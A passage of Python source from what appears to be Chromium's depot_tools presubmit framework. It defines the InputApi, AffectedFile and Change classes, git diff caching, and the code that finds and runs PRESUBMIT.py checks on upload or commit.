r"testing_support[\\\/]google_appengine[\\\/].*",
r".*\bexperimental[\\\/].*",
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r".*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*",
# Output directories (just in case)
r".*\bDebug[\\\/].*",
r".*\bRelease[\\\/].*",
r".*\bxcodebuild[\\\/].*",
r".*\bout[\\\/].*",
# All caps files like README and LICENCE.
r".*\b[A-Z0-9_]{2,}$",
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r"(|.*[\\\/])\.git[\\\/].*",
r"(|.*[\\\/])\.svn[\\\/].*",
# There is no point in processing a patch file.
r".+\.diff$",
r".+\.patch$",
)
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cPickle = cPickle
self.cpplint = cpplint
self.cStringIO = cStringIO
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 become default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.marshal = marshal
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.pickle = pickle
self.re = re
self.subprocess = subprocess
self.tempfile = tempfile
self.time = time
self.traceback = traceback
self.unittest = unittest
self.urllib2 = urllib2
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'python'. This is interpreted in CallCommand to
# convert to vpython in order to allow scripts in other repos (e.g. src.git)
# to automatically pick up that repo's .vpython file, instead of inheriting
# the one in depot_tools.
self.python_executable = 'python'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
# TODO(dpranke): figure out a list of all approved owners for a repo
# in order to be able to handle wildcard OWNERS files?
self.owners_db = owners.Database(change.RepositoryRoot(),
fopen=file, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with "base/containers/hash_tables.h" instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
    presubmit script. For example, it can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof.
"""
dir_with_slash = normpath("%s/" % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug("LocalPaths: %s", paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn("AffectedTestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self, affected_file, white_list=None, black_list=None):
"""Filters out files that aren't considered "source file".
    If white_list or black_list is None, InputApi.DEFAULT_WHITE_LIST
    and InputApi.DEFAULT_BLACK_LIST are used, respectively.
    The lists are compiled as regular expressions, and
    AffectedFile.LocalPath() must match the white list and not the black list.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, white_list or self.DEFAULT_WHITE_LIST) and
not Find(affected_file, black_list or self.DEFAULT_BLACK_LIST))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return filter(source_file, self.AffectedTestableFiles())
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in "new" version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
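  # Example use of RunTests from a PRESUBMIT.py (illustrative; the command and
  # script name are hypothetical):
  #   results.extend(input_api.RunTests([
  #       input_api.Command(name='mytest', cmd=['mytest.py'], kwargs={},
  #                         message=output_api.PresubmitError),
  #   ]))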
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
      # Compute a single diff for all files and parse the output; with git
      # this is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
      # This regex matches the path twice, separated by a space. Note that the
      # filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
    Deleted files are not text files."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the "left hand side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the "right hand
side".
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
return self._cached_new_contents[:]
def ChangedContents(self):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
if self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
self._cached_changed_contents = []
line_num = 0
for line in self.GenerateScmDiff().splitlines():
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
self._cached_changed_contents.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or "tag") lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
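  # For example, a description line "BUG=123,456" results in
  # tags == {'BUG': '123,456'} and change.BUG == '123,456'.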
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. "FOO="
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or "tag" lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
if not re.match(r"^[A-Z_]*$", attr):
raise AttributeError(self, attr)
return self.tags.get(attr)
def BugsFromDescription(self):
"""Returns all bugs referenced in the commit description."""
tags = [b.strip() for b in self.tags.get('BUG', '').split(',') if b.strip()]
footers = []
unsplit_footers = git_footers.parse_footers(self._full_description).get(
'Bug', [])
for unsplit_footer in unsplit_footers:
footers += [b.strip() for b in unsplit_footer.split(',')]
return sorted(set(tags + footers))
def ReviewersFromDescription(self):
"""Returns all reviewers listed in the commit description."""
# We don't support a "R:" git-footer for reviewers; that is in metadata.
tags = [r.strip() for r in self.tags.get('R', '').split(',') if r.strip()]
return sorted(set(tags))
def TBRsFromDescription(self):
"""Returns all TBR reviewers listed in the commit description."""
tags = [r.strip() for r in self.tags.get('TBR', '').split(',') if r.strip()]
# TODO(agable): Remove support for 'Tbr:' when TBRs are programmatically
# determined by self-CR+1s.
footers = git_footers.parse_footers(self._full_description).get('Tbr', [])
return sorted(set(tags + footers))
# TODO(agable): Delete these once we're sure they're unused.
@property
def BUG(self):
return ','.join(self.BugsFromDescription())
@property
def R(self):
return ','.join(self.ReviewersFromDescription())
@property
def TBR(self):
return ','.join(self.TBRsFromDescription())
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
raise NotImplementedError()
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Returns a list of AffectedFile instances for all files in the change.
Args:
include_deletes: If false, deleted files will be filtered out.
file_filter: An additional filter to apply.
Returns:
[AffectedFile(path, action), AffectedFile(path, action)]
"""
affected = filter(file_filter, self._affected_files)
if include_deletes:
return affected
return filter(lambda x: x.Action() != 'D', affected)
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Return a list of the existing text files in a change."""
if include_deletes is not None:
warn("AffectedTeestableFiles(include_deletes=%s)"
" is deprecated and ignored" % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return filter(lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def LocalPaths(self):
"""Convenience function."""
return [af.LocalPath() for af in self.AffectedFiles()]
def AbsoluteLocalPaths(self):
"""Convenience function."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def RightHandSideLines(self):
"""An iterator over all text lines in "new" version of changed files.
Lists lines from new or modified text files in the change.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
"""
return _RightHandSideLinesImpl(
x for x in self.AffectedFiles(include_deletes=False)
if x.IsTestableFile())
def OriginalOwnersFiles(self):
"""A map from path names of affected OWNERS files to their old content."""
def owners_file_filter(f):
return 'OWNERS' in os.path.split(f.LocalPath())[1]
files = self.AffectedFiles(file_filter=owners_file_filter)
return dict([(f.LocalPath(), f.OldContents()) for f in files])
class GitChange(Change):
_AFFECTED_FILES = GitAffectedFile
scm = 'git'
def AllFiles(self, root=None):
"""List all files under source control in the repo."""
root = root or self.RepositoryRoot()
return subprocess.check_output(
['git', '-c', 'core.quotePath=false', 'ls-files', '--', '.'],
cwd=root).splitlines()
def ListRelevantPresubmitFiles(files, root):
"""Finds all presubmit files that apply to a given set of source files.
If inherit-review-settings-ok is present right under root, looks for
PRESUBMIT.py in directories enclosing root.
Args:
files: An iterable container containing file paths.
root: Path where to stop searching.
Return:
List of absolute paths of the existing PRESUBMIT.py scripts.
"""
files = [normpath(os.path.join(root, f)) for f in files]
# List all the individual directories containing files.
directories = set([os.path.dirname(f) for f in files])
# Ignore root if inherit-review-settings-ok is present.
if os.path.isfile(os.path.join(root, 'inherit-review-settings-ok')):
root = None
# Collect all unique directories that may contain PRESUBMIT.py.
candidates = set()
for directory in directories:
while True:
if directory in candidates:
break
candidates.add(directory)
if directory == root:
break
parent_dir = os.path.dirname(directory)
if parent_dir == directory:
# We hit the system root directory.
break
directory = parent_dir
# Look for PRESUBMIT.py in all candidate directories.
results = []
for directory in sorted(list(candidates)):
try:
for f in os.listdir(directory):
p = os.path.join(directory, f)
if os.path.isfile(p) and re.match(
r'PRESUBMIT.*\.py$', f) and not f.startswith('PRESUBMIT_test'):
results.append(p)
except OSError:
pass
logging.debug('Presubmit files: %s', ','.join(results))
return results
class GetTryMastersExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, project, change):
"""Executes GetPreferredTryMasters() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
project: Project name to pass to presubmit script for bot selection.
Return:
A map of try masters to map of builders to set of tests.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'GetPreferredTryMasters'
if function_name not in context:
return {}
get_preferred_try_masters = context[function_name]
if not len(inspect.getargspec(get_preferred_try_masters)[0]) == 2:
raise PresubmitFailure(
'Expected function "GetPreferredTryMasters" to take two arguments.')
return get_preferred_try_masters(project, change)
class GetPostUploadExecuter(object):
@staticmethod
def ExecPresubmitScript(script_text, presubmit_path, cl, change):
"""Executes PostUploadHook() from a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: Project script to run.
cl: The Changelist object.
change: The Change object.
Return:
A list of results objects.
"""
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s'
% (presubmit_path, e))
function_name = 'PostUploadHook'
if function_name not in context:
return {}
post_upload_hook = context[function_name]
if not len(inspect.getargspec(post_upload_hook)[0]) == 3:
raise PresubmitFailure(
'Expected function "PostUploadHook" to take three arguments.')
return post_upload_hook(cl, change, OutputApi(False))
def _MergeMasters(masters1, masters2):
"""Merges two master maps. Merges also the tests of each builder."""
result = {}
for (master, builders) in itertools.chain(masters1.iteritems(),
masters2.iteritems()):
new_builders = result.setdefault(master, {})
for (builder, tests) in builders.iteritems():
new_builders.setdefault(builder, set([])).update(tests)
return result
def DoGetTryMasters(change,
changed_files,
repository_root,
default_presubmit,
project,
verbose,
output_stream):
"""Get the list of try masters from the presubmit scripts.
Args:
changed_files: List of modified files.
repository_root: The repository root.
default_presubmit: A default presubmit script to execute in any case.
project: Optional name of a project used in selecting trybots.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
Return:
Map of try masters to map of builders to set of tests.
"""
presubmit_files = ListRelevantPresubmitFiles(changed_files, repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = {}
executer = GetTryMastersExecuter()
if default_presubmit:
if verbose:
output_stream.write("Running default presubmit script.\n")
fake_path = os.path.join(repository_root, 'PRESUBMIT.py')
results = _MergeMasters(results, executer.ExecPresubmitScript(
default_presubmit, fake_path, project, change))
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results = _MergeMasters(results, executer.ExecPresubmitScript(
presubmit_script, filename, project, change))
# Make sets to lists again for later JSON serialization.
for builders in results.itervalues():
for builder in builders:
builders[builder] = list(builders[builder])
if results and verbose:
output_stream.write('%s\n' % str(results))
return results
def DoPostUploadExecuter(change,
cl,
repository_root,
verbose,
output_stream):
"""Execute the post upload hook.
Args:
change: The Change object.
cl: The Changelist object.
repository_root: The repository root.
verbose: Prints debug info.
output_stream: A stream to write debug output to.
"""
presubmit_files = ListRelevantPresubmitFiles(
change.LocalPaths(), repository_root)
if not presubmit_files and verbose:
output_stream.write("Warning, no PRESUBMIT.py found.\n")
results = []
executer = GetPostUploadExecuter()
# The root presubmit file should be executed after the ones in subdirectories.
# i.e. the specific post upload hooks should run before the general ones.
# Thus, reverse the order provided by ListRelevantPresubmitFiles.
presubmit_files.reverse()
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output_stream.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results.extend(executer.ExecPresubmitScript(
presubmit_script, filename, cl, change))
output_stream.write('\n')
if results:
output_stream.write('** Post Upload Hook Messages **\n')
for result in results:
result.handle(output_stream)
output_stream.write('\n')
return results
class PresubmitExecuter(object):
def __init__(self, change, committing, verbose,
gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
self.change = change
self.committing = committing
self.gerrit = gerrit_obj
self.verbose = verbose
self.dry_run = dry_run
self.more_cc = []
self.thread_pool = thread_pool
self.parallel = parallel
def ExecPresubmitScript(self, script_text, presubmit_path):
"""Executes a single presubmit script.
Args:
script_text: The text of the presubmit script.
presubmit_path: The path to the presubmit file (this will be reported via
input_api.PresubmitLocalPath()).
Return:
A list of result objects, empty if no problems.
"""
# Change to the presubmit file's directory to support local imports.
main_path = os.getcwd()
os.chdir(os.path.dirname(presubmit_path))
# Load the presubmit script into context.
input_api = InputApi(self.change, presubmit_path, self.committing,
self.verbose, gerrit_obj=self.gerrit,
dry_run=self.dry_run, thread_pool=self.thread_pool,
parallel=self.parallel)
output_api = OutputApi(self.committing)
context = {}
try:
exec(compile(script_text, 'PRESUBMIT.py', 'exec', dont_inherit=True),
context)
except Exception as e:
raise PresubmitFailure('"%s" had an exception.\n%s' % (presubmit_path, e))
# These function names must change if we make substantial changes to
# the presubmit API that are not backwards compatible.
if self.committing:
function_name = 'CheckChangeOnCommit'
else:
function_name = 'CheckChangeOnUpload'
if function_name in context:
try:
context['__args'] = (input_api, output_api)
logging.debug('Running %s in %s', function_name, presubmit_path)
result = eval(function_name + '(*__args)', context)
logging.debug('Running %s done.', function_name)
self.more_cc.extend(output_api.more_cc)
finally:
map(os.remove, input_api._named_temporary_files)
if not (isinstance(result, types.TupleType) or
isinstance(result, types.ListType)):
raise PresubmitFailure(
'Presubmit functions must return a tuple or list')
for item in result:
if not isinstance(item, OutputApi.PresubmitResult):
raise PresubmitFailure(
'All presubmit results must be of types derived from '
'output_api.PresubmitResult')
else:
result = () # no error since the script doesn't care about current event.
# Return the process to the original working directory.
os.chdir(main_path)
return result
def DoPresubmitChecks(change,
committing,
verbose,
output_stream,
input_stream,
default_presubmit,
may_prompt,
gerrit_obj,
dry_run=None,
parallel=False,
json_output=None):
"""Runs all presubmit checks that apply to the files in the change.
This finds all PRESUBMIT.py files in directories enclosing the files in the
change (up to the repository root) and calls the relevant entrypoint function
depending on whether the change is being committed or uploaded.
Prints errors, warnings and notifications. Prompts the user for warnings
when needed.
Args:
change: The Change object.
committing: True if 'git cl land' is running, False if 'git cl upload' is.
verbose: Prints debug info.
output_stream: A stream to write output from presubmit tests to.
input_stream: A stream to read input from the user.
default_presubmit: A default presubmit script to execute in any case.
may_prompt: Enable (y/n) questions on warning or error. If False,
any questions are answered with yes by default.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests specified by input_api.RunTests in all
PRESUBMIT files will be run in parallel.
Warning:
If may_prompt is true, output_stream SHOULD be sys.stdout and input_stream
SHOULD be sys.stdin.
Return:
A PresubmitOutput object. Use output.should_continue() to figure out
if there were errors or warnings and the caller should abort.
"""
old_environ = os.environ
try:
# Make sure python subprocesses won't generate .pyc files.
os.environ = os.environ.copy()
os.environ['PYTHONDONTWRITEBYTECODE'] = '1'
output = PresubmitOutput(input_stream, output_stream)
if committing:
output.write("Running presubmit commit checks ...\n")
else:
output.write("Running presubmit upload checks ...\n")
start_time = time.time()
presubmit_files = ListRelevantPresubmitFiles(
change.AbsoluteLocalPaths(), change.RepositoryRoot())
if not presubmit_files and verbose:
output.write("Warning, no PRESUBMIT.py found.\n")
results = []
thread_pool = ThreadPool()
executer = PresubmitExecuter(change, committing, verbose, gerrit_obj,
dry_run, thread_pool, parallel)
if default_presubmit:
if verbose:
output.write("Running default presubmit script.\n")
fake_path = os.path.join(change.RepositoryRoot(), 'PRESUBMIT.py')
results += executer.ExecPresubmitScript(default_presubmit, fake_path)
for filename in presubmit_files:
filename = os.path.abspath(filename)
if verbose:
output.write("Running %s\n" % filename)
# Accept CRLF presubmit script.
presubmit_script = gclient_utils.FileRead(filename, 'rU')
results += executer.ExecPresubmitScript(presubmit_script, filename)
results += thread_pool.RunAsync()
output.more_cc.extend(executer.more_cc)
errors = []
notifications = []
warnings = []
for result in results:
if result.fatal:
errors.append(result)
elif result.should_prompt:
warnings.append(result)
else:
notifications.append(result)
if json_output:
# Write the presubmit results to json output
presubmit_results = {
'errors': [
error.json_format() for error in errors
],
'notifications': [
notification.json_format() for notification in notifications
],
'warnings': [
warning.json_format() for warning in warnings
]
}
gclient_utils.FileWrite(json_output, json.dumps(presubmit_results))
output.write('\n')
for name, items in (('Messages', notifications),
('Warnings', warnings),
('ERRORS', errors)):
if items:
output.write('** Presubmit %s **\n' % name)
for item in items:
item.handle(output)
output.write('\n')
total_time = time.time() - start_time
if total_time > 1.0:
output.write("Presubmit checks took %.1fs to calculate.\n\n" % total_time)
if errors:
output.fail()
elif warnings:
output.write('There were presubmit warnings. ')
if may_prompt:
output.prompt_yes_no('Are you sure you wish to continue? (y/N): ')
else:
output.write('Presubmit checks passed.\n')
global _ASKED_FOR_FEEDBACK
# Ask for feedback one time out of 5.
if (len(results) and random.randint(0, 4) == 0 and not _ASKED_FOR_FEEDBACK):
output.write(
'Was the presubmit check useful? If not, run "git cl presubmit -v"\n'
'to figure out which PRESUBMIT.py was run, then run git blame\n'
'on the file to figure out who to ask for help.\n')
_ASKED_FOR_FEEDBACK = True
return output
finally:
os.environ = old_environ
def ScanSubDirs(mask, recursive):
if not recursive:
return [x for x in glob.glob(mask) if x not in ('.svn', '.git')]
results = []
for root, dirs, files in os.walk('.'):
if '.svn' in dirs:
dirs.remove('.svn')
if '.git' in dirs:
dirs.remove('.git')
for name in files:
if fnmatch.fnmatch(name, mask):
results.append(os.path.join(root, name))
return results
def ParseFiles(args, recursive):
logging.debug('Searching for %s', args)
files = []
for arg in args:
files.extend([('M', f) for f in ScanSubDirs(arg, recursive)])
return files
def load_files(options, args):
"""Tries to determine the SCM."""
files = []
if args:
files = ParseFiles(args, options.recursive)
change_scm = scm.determine_scm(options.root)
if change_scm == 'git':
